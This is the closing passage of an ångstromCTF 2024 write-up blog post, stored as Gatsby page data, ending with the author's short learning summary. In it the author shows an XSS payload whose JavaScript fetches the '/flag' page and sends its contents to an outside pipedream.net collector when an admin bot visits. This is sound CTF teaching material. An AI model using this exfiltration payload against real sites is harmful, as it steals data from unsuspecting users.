punctuation\">></span></span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;/</span>img</span><span class=\"token punctuation\">></span></span></code></pre></div>\n<p>This payload executes the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/flag\"</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">response</span> <span class=\"token operator\">=></span> response<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">htmlString</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"GET response HTML:\"</span><span class=\"token punctuation\">,</span> htmlString<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">const</span> encodedHtmlString <span class=\"token operator\">=</span> <span class=\"token function\">encodeURIComponent</span><span class=\"token punctuation\">(</span>htmlString<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">const</span> targetUrl <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">https://eoxwstthee5l1zi.m.pipedream.net?query=</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>encodedHtmlString<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">;</span>\n        <span class=\"token keyword\">return</span> <span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span>targetUrl<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">response</span> <span class=\"token operator\">=></span> response<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">result</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n        console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"GET response from target URL:\"</span><span class=\"token punctuation\">,</span> result<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Having the admin bot visit the page containing this exploit delivered the flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/21482/image-20240526003701192.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 45.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABCklEQVQoz51Si06EMBDk///QaKJeDoFDoQ9K34y7KxoSvYTYZNhsl5nObttcXlvoNWIyC8bZ4DZpwThrzMZBOQ/TDbg+PKJ7ucAMN6h+EGiOXS/R3kYs4zsatyxIpSKkjEgIB3AeqbYQoX96xnxtYds36B1GYitxpYM8iTYhBPDato0/v8D76+JgtUaMCSkdcMhjjIghovHeC7fW+jeo6IyFVYocJ9krpdz9XwR5cbLtjhjfOZMDCVmapSWnnJd7h58TrNKqcyumWSHTiGrO4vyHc+CeFuR2tdIoNCup7XP/t0Me+motKgsSCvEqvYIj55xDip7azNRmpMvxHxP89IVAjhPdbM5F6oxPS/u/dACWjyoAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/8ac56/image-20240526003701192.webp 240w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/d3be9/image-20240526003701192.webp 480w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/e46b2/image-20240526003701192.webp 960w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/e5c51/image-20240526003701192.webp 1350w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/8ff5a/image-20240526003701192.png 240w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/e85cb/image-20240526003701192.png 480w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/d9199/image-20240526003701192.png 960w,\n/static/39bb2984aff58bb3bfbe05e1587ca1d6/21482/image-20240526003701192.png 1350w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/39bb2984aff58bb3bfbe05e1587ca1d6/d9199/image-20240526003701192.png\"\n            alt=\"image-20240526003701192\"\n            title=\"image-20240526003701192\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I have started studying Pwn and Web, but I am still far from proficient — need to keep grinding.</p>\n<p>I solved an interesting Pwn challenge, which I plan to write up in a separate article later.</p>","fields":{"slug":"/ctf-angstrom-ctf-2024-en","tagSlugs":["/tag/rev-en/","/tag/pwn-en/","/tag/web-en/","/tag/english/"]},"frontmatter":{"date":"2024-05-28","description":"ångstromCTF 2024 Writeup","tags":["Rev (en)","Pwn (en)","Web (en)","English"],"title":"ångstromCTF 2024 Writeup","socialImage":{"publicURL":"/static/5f4c0eaf07bfac9e87da15512e6e010e/ctf-angstrom-ctf-2024.png"}}}},"pageContext":{"slug":"/ctf-angstrom-ctf-2024-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}